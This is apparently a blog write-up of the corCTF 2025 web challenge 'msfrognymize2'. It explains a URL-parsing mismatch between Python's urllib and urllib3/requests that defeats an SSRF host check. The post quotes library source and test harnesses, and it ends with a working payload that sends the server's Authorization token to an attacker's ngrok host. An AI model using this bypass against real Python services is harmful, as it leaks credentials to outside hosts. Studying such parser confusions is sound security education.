Sunday, September 14, 2025

corCTF 2025 - Python URL Parsing Confusion

corCTF 2025 - Python URL Parsing Confusion

corCTF is maintained by the Crusaders of Rust Team.

This is a great CTF for Web with some really hard and creative challenges. In 2025, they brought some interesting exploration of Python URL Parsing Confusion, that is interesting to understand.

I played the 2 previous editions and it continues to be awesome. We already wrote some writeups on their challenges:

  • 2024: https://fireshellsecurity.team/corctf2024-challenge-dev/
  • 2023: https://fireshellsecurity.team/corctf2023-web/

The idea here is to deep dive into the details of the specific parsing behaviours explored here.

Challenge: web-msfrognymize2 (20 solves)

Difficulty: 👽👽👽👾👾👾👾👾👾👾

First-Look

This is actually a new version of the original 2023 msfrognymize challenge, which we solved 😎

You send a photo and it hides the faces using some image processing libs.

For some random reason, I used a picture of Eva Longoria, and it worked fine.

The URL of the new image is:

http://localhost:8443/anonymized/?uuid=97472287-8588-4f77-b98b-ab3ae7607c0e

As we can see, it generates a uuidv4 for each new generated image.

Architecture

Before diving into the code, it’s better to understand the app architecture.

The application is a little bit more complex, because it processes the uploads asynchronously (steps 1 to 5). Just ignore the missing step 8. I just won’t fix the image anymore 😆 lazy writing.

The key here is understanding the step 6, where there is an SSRF opportunity, that we will discuss.

Code Analysis

Code is much bigger here, so we won’t get into so much detail. There is some interesting crypto metadata, but it does not help our solution.

Flag is on secret.py:

API_TOKEN = "corctf{EXAMPLE_FLAG}"

It is used on the app.py:

#...
import requests
from urllib.parse import urljoin, urlparse
from secret import API_TOKEN
#...

@app.route('/anonymized/')
def serve_image():
    image_uuid = ""
    try:
        image_uuid = request.args.get('uuid')
        
        # ====> FOCUS!! <===
        url = create_file_url(image_uuid)
        resp = requests.get(url, headers={"Authorization": f"Token {API_TOKEN}"})
        # ====> END FOCUS <===
        
        if resp.status_code != 200:
            raise ValueError("File does not exist according to fileserver")

        return send_file(
            io.BytesIO(resp.content),
            mimetype="image/png",
            as_attachment=False,
            download_name=f"{image_uuid}.png"
        )
    except Exception as e:
        return f"Image {image_uuid} cannot be found: {e}.", 404
    
def create_file_url(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)

    parsed = urlparse(file_url)

    if parsed.scheme != "http":
        raise ValueError("Invalid sheme")
    if parsed.hostname != "127.0.0.1":
        raise ValueError("Invalid host")
    if parsed.port != 8000:
        raise ValueError("Invalid port")

    return file_url
#...

It calls a “file URL” using a key (flag), that we want to obtain. If we can forge a rogue URL (to our controlled server), it will send the Auth Key to us.

The create_file_url function creates a new URL using a fixed (so far) http://127.0.0.1:8000 address, by joining the UUID as path, using urllib.parse.urljoin. This is the address of the File Server Flask service mentioned in the architecture, which looks like this, in a regular scenario:

http://127.0.0.1:8000/97472287-8588-4f77-b98b-ab3ae7607c0e

This new URL is the re-parsed, using urllib.parse.urlparse, to validate and avoid SSRF attacks, checking for protocol, hostname and port.

After returning, it uses the joined url (not the re-parsed) to GET the file contents, using requests.get, and then returning to the user as image.

Find the Hack

At this point, it is pretty clear that we need to abuse those url parsing complex steps to get an SSRF.

We need a URL that will:

  1. bypass the urljoin to change localhost to our bad boy server address.
  2. bypass the urlparse to pass the checks for localhost and port.
  3. use our server address to the requests.get, to actually send the flag key to us.

We have to find a parsing confusion between urlparse and requests.get to achieve this.

URL Confusion and the Hacking Scenario

In 2017, The hacker Orange Tsai published the excellent article A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!, showing that URL parsing is actually pretty hard and prone to confusion between different implementations.

Since then, many hackers expanded his research and found new URL parsing confusion in other implementations.

urllib vs. urllib3 vs. requests

urllib is the standard, native library from Python 3 to work with URLs. urllib3 is a third-party HTTP client for Python. Those are different implementations.

requests - HTTP for Humans - is a simple and popular http library. Behind the scenes, it uses urllib3, so we will focus on the difference between the urllib* implementations above.

urljoin

The urljoin function allows us to add components to a URL, like this:

urljoin("http://abc.com", "def")
'http://abc.com/def'

It turns out that joining URLs is a dangerous adventure here, as advised in the function documentation.

Warning: Because an absolute URL may be passed as the url parameter, it is generally not secure to use urljoin with an attacker-controlled url. For example in, urljoin(“https://website.com/users/”, username), if username can contain an absolute URL, the result of urljoin will be the absolute URL.

So, we have this behaviour:

urljoin("http://legit.com", "http://0wned.com")
'http://0wned.com'

So let’s look at our function, ignoring the validation at first:

def create_file_url(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    #parsed = urlparse(file_url)
    #if parsed.scheme != "http":
    #    raise ValueError("Invalid sheme")
    #if parsed.hostname != "127.0.0.1":
    #    raise ValueError("Invalid host")
    #if parsed.port != 8000:
    #    raise ValueError("Invalid port")
    return file_url

create_file_url(str(uuid.uuid4())) # regular scenario
'http://127.0.0.1:8000/c526ffab-0b0a-4c66-bd2f-d9d491a81870'

create_file_url("http://0wned.com") # failed attack
'http://127.0.0.1:8000/http://0wned.com

The the regular scenario is just to show the basic function working and the failed attack is just to show the app function have a “protection”, since it uses a slash before the uuid, which generates a path.

But we can still use a trick: //0wned.com/ is a valid URL in certain scenarios, like this :)

create_file_url("/0wned.com")
'http://0wned.com'

Note that I used only one slash, because the original function already adds one. We have a path here to exfiltrate the key, but… we still have the urlparse validation.

def create_file_url(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    parsed = urlparse(file_url)
    if parsed.scheme != "http":
        raise ValueError("Invalid sheme")
    if parsed.hostname != "127.0.0.1":
        raise ValueError("Invalid host")
    if parsed.port != 8000:
        raise ValueError("Invalid port")
    return file_url

create_file_url("/0wned.com") # still failed
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 7, in create_file_url
ValueError: Invalid host

Spoiler: Payload

At CTF time, I found the solution before actually understanding it. I was just manually fuzzing. If I had just read some articles, like this nice text from SonarSource, I would directly have found the payload.

Source: SonarSource 😌

But the fun is understanding how it works, so let’s keep going.

The testcase below helps to understand how it works.

from urllib.parse import urljoin, urlparse
import requests
import logging
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('requests').setLevel(logging.DEBUG)
logging.getLogger('urllib3').setLevel(logging.DEBUG)

def test_parsed(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    parsed = urlparse(file_url)
    print("file_url        = ", file_url)
    print("parsed.scheme   = ", parsed.scheme)
    print("parsed.hostname = ", parsed.hostname)
    print("parsed.port     = ", parsed.port)
    print("parsed          = ", parsed)

    print('======> GETTING')
    response = requests.get(file_url)
    print(response.text)
    return parsed

The function shows the parsed components and the logger will show the URL used by the requests.get later.

Let’s start with the regular scenario, with some uuid:

test_parsed(str(uuid.uuid4()))

file_url        =  http://127.0.0.1:8000/8ff6333b-8180-4b9d-93bc-9ce305ec1238
parsed.scheme   =  http
parsed.hostname =  127.0.0.1
parsed.port     =  8000
parsed          =  ParseResult(scheme='http', netloc='127.0.0.1:8000', path='/8ff6333b-8180-4b9d-93bc-9ce305ec1238', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 127.0.0.1:8000
Traceback (most recent call last):
  File ".../lib/python3.12/site-packages/urllib3/connection.py", line 198, in _new_conn

Let’s break to our first step of the attack.

test_parsed("/fireshellsecurity.team/a")

file_url        =  http://fireshellsecurity.team/a
parsed.scheme   =  http
parsed.hostname =  fireshellsecurity.team
parsed.port     =  None
parsed          =  ParseResult(scheme='http', netloc='fireshellsecurity.team', path='/a', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): fireshellsecurity.team:80
# ...

Works as expected, but does not pass the validation.

Let’s try the authentication trick:

test_parsed("/fireshellsecurity.team@127.0.0.1:8000")

file_url        =  http://fireshellsecurity.team@127.0.0.1:8000
parsed.scheme   =  http
parsed.hostname =  127.0.0.1
parsed.port     =  8000
parsed          =  ParseResult(scheme='http', netloc='fireshellsecurity.team@127.0.0.1:8000', path='', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 127.0.0.1:8000
Traceback (most recent call last):
# ...

Both implementations respect the authentication format, so we still do not pass.

But let’s (FINALLY), move to the working payload, by adding a backslash (\) before the @. We use 2 backslashes here only for Pythonic purposes, but it will use only 1.

test_parsed("/fireshellsecurity.team\\@127.0.0.1:8000")

file_url        =  http://fireshellsecurity.team\@127.0.0.1:8000
parsed.scheme   =  http
parsed.hostname =  127.0.0.1
parsed.port     =  8000
parsed          =  ParseResult(scheme='http', netloc='fireshellsecurity.team\\@127.0.0.1:8000', path='', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): fireshellsecurity.team:80
DEBUG:urllib3.connectionpool:http://fireshellsecurity.team:80 "GET /%5C@127.0.0.1:8000 HTTP/1.1" 301 None
# ...

OK! So the urlparse thinks the authority is http://127.0.0.1:8000, but requests.get is using the first authority http://fireshellsecurity.team:80/%5C@127.0.0.1:8000.

We have a working testcase to bypass the SSRF protection, but…

Understanding urlparse

Let’s start by analyzing the urllib.parse source code.

The magic actually happens on the urlsplit function:

def urlsplit(url, scheme='', allow_fragments=True):
    """Parse a URL into 5 components:
    <scheme>://<netloc>/<path>?<query>#<fragment>

    The result is a named 5-tuple with fields corresponding to the
    above. It is either a SplitResult or SplitResultBytes object,
    depending on the type of the url parameter.

    The username, password, hostname, and port sub-components of netloc
    can also be accessed as attributes of the returned object.

    The scheme argument provides the default value of the scheme
    component when no scheme is found in url.

    If allow_fragments is False, no attempt is made to separate the
    fragment component from the previous component, which can be either
    path or query.

    Note that % escapes are not expanded.
    """

    url, scheme, _coerce_result = _coerce_args(url, scheme)
    # Only lstrip url as some applications rely on preserving trailing space.
    # (https://url.spec.whatwg.org/#concept-basic-url-parser would strip both)
    url = url.lstrip(_WHATWG_C0_CONTROL_OR_SPACE)
    scheme = scheme.strip(_WHATWG_C0_CONTROL_OR_SPACE)

    for b in _UNSAFE_URL_BYTES_TO_REMOVE:
        url = url.replace(b, "")
        scheme = scheme.replace(b, "")

    allow_fragments = bool(allow_fragments)
    netloc = query = fragment = ''
    i = url.find(':')
    if i > 0 and url[0].isascii() and url[0].isalpha():
        for c in url[:i]:
            if c not in scheme_chars:
                break
        else:
            scheme, url = url[:i].lower(), url[i+1:]
    if url[:2] == '//':
        netloc, url = _splitnetloc(url, 2)
        if (('[' in netloc and ']' not in netloc) or
                (']' in netloc and '[' not in netloc)):
            raise ValueError("Invalid IPv6 URL")
        if '[' in netloc and ']' in netloc:
            _check_bracketed_netloc(netloc)
    if allow_fragments and '#' in url:
        url, fragment = url.split('#', 1)
    if '?' in url:
        url, query = url.split('?', 1)
    _checknetloc(netloc)
    #v = SplitResult(scheme, netloc, url, query, fragment)
    #return _coerce_result(v)
    return (scheme, netloc, url, query, fragment)

The testcase returns the URL splitted in those parts:

urlsplit("http://abc.com/a/b.html#x")

('http', 'abc.com', '/a/b.html', '', 'x')

Let’s try with our payload (with some extra components):

urlsplit("//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x")

('', 'fireshellsecurity.team\\@127.0.0.1:8000', '/abc', 'a=1', 'x')

OK, the netloc is fireshellsecurity.team\\@127.0.0.1:8000, which is not completely parsed yet. The netloc is broken down, after that, on hostname, port, user and password.

Before getting down one more step, it is important to understand why the next component (query) starts in /abc. It happens in the function _splitnetloc.

def _splitnetloc(url, start=0):
    delim = len(url)   # position of end of domain part of url, default is end
    for c in '/?#':    # look for delimiters; the order is NOT important
        wdelim = url.find(c, start)        # find first of this delim
        if wdelim >= 0:                    # if found
            delim = min(delim, wdelim)     # use earliest delim position
    return url[start:delim], url[delim:]   # return (domain, rest)

It starts the query component only when getting one of these chars: /, ?, #. So, after finding the slash (/) in our current scenario (this is key to the vulnerability).

To decompose the netloc in it’s subcomponents, it uses the functions _hostinfo and _userinfo, from _NetlocResultMixinStr:

class _NetlocResultMixinStr(_NetlocResultMixinBase, _ResultMixinStr):
    __slots__ = ()

    @property
    def _userinfo(self):
        netloc = self.netloc
        userinfo, have_info, hostinfo = netloc.rpartition('@')
        if have_info:
            username, have_password, password = userinfo.partition(':')
            if not have_password:
                password = None
        else:
            username = password = None
        return username, password

    @property
    def _hostinfo(self):
        netloc = self.netloc
        _, _, hostinfo = netloc.rpartition('@')
        _, have_open_br, bracketed = hostinfo.partition('[')
        if have_open_br:
            hostname, _, port = bracketed.partition(']')
            _, _, port = port.partition(':')
        else:
            hostname, _, port = hostinfo.partition(':')
        if not port:
            port = None
        return hostname, port

Let’s expand our testcase to include these functions (in a simpler way).

def _hostinfo(netloc):
    netloc = netloc
    _, _, hostinfo = netloc.rpartition('@')
    _, have_open_br, bracketed = hostinfo.partition('[')
    if have_open_br:
        hostname, _, port = bracketed.partition(']')
        _, _, port = port.partition(':')
    else:
        hostname, _, port = hostinfo.partition(':')
    if not port:
        port = None
    return hostname, port

def _userinfo(netloc):
    netloc = netloc
    userinfo, have_info, hostinfo = netloc.rpartition('@')
    if have_info:
        username, have_password, password = userinfo.partition(':')
        if not have_password:
            password = None
    else:
        username = password = None
    return username, password

And testing it:

#test
url = "//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x"

split_result = urlsplit(url)
scheme, netloc, url, query, fragment = split_result
print(split_result)

hostname, port = _hostinfo(netloc)
username, password = _userinfo(netloc)

print("Host: ", hostname)
print("Port: ", port)
print("User: ", username)
print("Pswd: ", password)

# results
('', 'fireshellsecurity.team\\@127.0.0.1:8000', '/abc', 'a=1', 'x')
Host:  127.0.0.1
Port:  8000
User:  fireshellsecurity.team\
Pswd:  None

The hostname starts between the @ and the port delimiter (:), as expected. Note that the username includes the backslash (\), which is also important.

OK, now we are ninjas on the stardard urllib. Moving on.

Analyzing requests.get / urllib3

Now, let’s make the same breakdown analysis of the urllib3 parsing, used by requests library.

It happens on the parse_url function.

def parse_url(url: str) -> Url:
    """
    Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is
    performed to parse incomplete urls. Fields not provided will be None.
    This parser is RFC 3986 and RFC 6874 compliant.

    The parser logic and helper functions are based heavily on
    work done in the ``rfc3986`` module.

    :param str url: URL to parse into a :class:`.Url` namedtuple.

    Partly backwards-compatible with :mod:`urllib.parse`.

    Example:

    .. code-block:: python

        import urllib3

        print( urllib3.util.parse_url('http://google.com/mail/'))
        # Url(scheme='http', host='google.com', port=None, path='/mail/', ...)

        print( urllib3.util.parse_url('google.com:80'))
        # Url(scheme=None, host='google.com', port=80, path=None, ...)

        print( urllib3.util.parse_url('/foo?bar'))
        # Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...)
    """
    if not url:
        # Empty
        return Url()

    source_url = url
    if not _SCHEME_RE.search(url):
        url = "//" + url

    scheme: str | None
    authority: str | None
    auth: str | None
    host: str | None
    port: str | None
    port_int: int | None
    path: str | None
    query: str | None
    fragment: str | None

    try:
        scheme, authority, path, query, fragment = _URI_RE.match(url).groups()  # type: ignore[union-attr]
        normalize_uri = scheme is None or scheme.lower() in _NORMALIZABLE_SCHEMES

        if scheme:
            scheme = scheme.lower()

        if authority:
            auth, _, host_port = authority.rpartition("@")
            auth = auth or None
            host, port = _HOST_PORT_RE.match(host_port).groups()  # type: ignore[union-attr]
            if auth and normalize_uri:
                auth = _encode_invalid_chars(auth, _USERINFO_CHARS)
            if port == "":
                port = None
        else:
            auth, host, port = None, None, None

        if port is not None:
            port_int = int(port)
            if not (0 <= port_int <= 65535):
                raise LocationParseError(url)
        else:
            port_int = None

        host = _normalize_host(host, scheme)

        if normalize_uri and path:
            path = _remove_path_dot_segments(path)
            path = _encode_invalid_chars(path, _PATH_CHARS)
        if normalize_uri and query:
            query = _encode_invalid_chars(query, _QUERY_CHARS)
        if normalize_uri and fragment:
            fragment = _encode_invalid_chars(fragment, _FRAGMENT_CHARS)

    except (ValueError, AttributeError) as e:
        raise LocationParseError(source_url) from e

    # For the sake of backwards compatibility we put empty
    # string values for path if there are any defined values
    # beyond the path in the URL.
    # TODO: Remove this when we break backwards compatibility.
    if not path:
        if query is not None or fragment is not None:
            path = ""
        else:
            path = None

    return Url(
        scheme=scheme,
        auth=auth,
        host=host,
        port=port_int,
        path=path,
        query=query,
        fragment=fragment,
    )

OK, way more complex, but we just new a few lines of code to understand the part of the parsing that we need. We can do it with a much simpler testcase:

import re

url = "//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x"

_URI_RE = re.compile(
    r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?"
    r"(?://([^\\/?#]*))?"
    r"([^?#]*)"
    r"(?:\?([^#]*))?"
    r"(?:#(.*))?$",
    re.UNICODE | re.DOTALL,
)

# authority == netloc, for all effects
scheme, authority, path, query, fragment = _URI_RE.match(url).groups()

print('==> REGEX URL')
print('Scheme: ', scheme)
print('Authority: ', authority)
print('Path: ', path)
print('Query: ', query)
print('fragment: ', fragment)

print('==> PARSE AUTH')
auth, _, host_port = authority.rpartition("@")
print('Auth: ', auth)
print('Host: ', host_port)

And the result:

python parse_url.py '//fireshellsecurity.team\@127.0.0.1:8000/abc?a=1#x' 

==> URL
//fireshellsecurity.team\@127.0.0.1:8000/abc?a=1#x

==> REGEX URL
Scheme:  None
Netloc:  fireshellsecurity.team
Path:  \@127.0.0.1:8000/abc
Query:  a=1
fragment:  x

==> PARSE AUTH
Auth:  
Host:  fireshellsecurity.team

The netloc now finishes on the fireshellsecurity.team domain and the localhost is part of the query!

Let’s remember the standard urllib result for easy comparison:

# test
url = "//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x"

split_result = urlsplit(url)
scheme, netloc, url, query, fragment = split_result
print(split_result)

hostname, port = _hostinfo(netloc)
username, password = _userinfo(netloc)

print("Host: ", hostname)
print("Port: ", port)
print("User: ", username)
print("Pswd: ", password)

# results
('', 'fireshellsecurity.team\\@127.0.0.1:8000', '/abc', 'a=1', 'x')
Host:  127.0.0.1
Port:  8000
User:  fireshellsecurity.team\
Pswd:  None

In the case of urllib3, the component separation is done by this really complex regex split:

_URI_RE = re.compile(
    r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?"
    r"(?://([^\\/?#]*))?" # NETLOC
    r"([^?#]*)"
    r"(?:\?([^#]*))?"
    r"(?:#(.*))?$",
    re.UNICODE | re.DOTALL,
)

The second regex group finds the authority / netloc inside the URL. After the :// from the protocol, it looks for everything before any of those chars: \, /, ?, #.

Wait!! There is a backslash on the regex!!

We can summarize the big difference (for our purposes), on the ending characters allowed for the netloc component.

Library / ? # \
Standard urllib Y Y Y N
urllib3 / requests Y Y Y Y

Exploiting 💀

Knowing what we know now, we just need to apply the payload to receive the flag. We can just setup an ngrok or similar.

/000000000000.ngrok-free.app\\@127.0.0.1:8000

The final url is like this:

https://msfrognymize2.ctfi.ng/anonymized/?uuid=/000000000000.ngrok-free.app\\@127.0.0.1:8000

The gift arrives in our inbox.

corctf{why_4re_pyth0n_jo1n_funt10ns_s0_w3ird?!}

Takeaways

By looking a little bit at two implementations of URL in the same language, we found a world of difference. Looks like there is a lot to explore yet and new vulnerabilities may arise at any moment.

References

Capture the Flag , Web , Writeup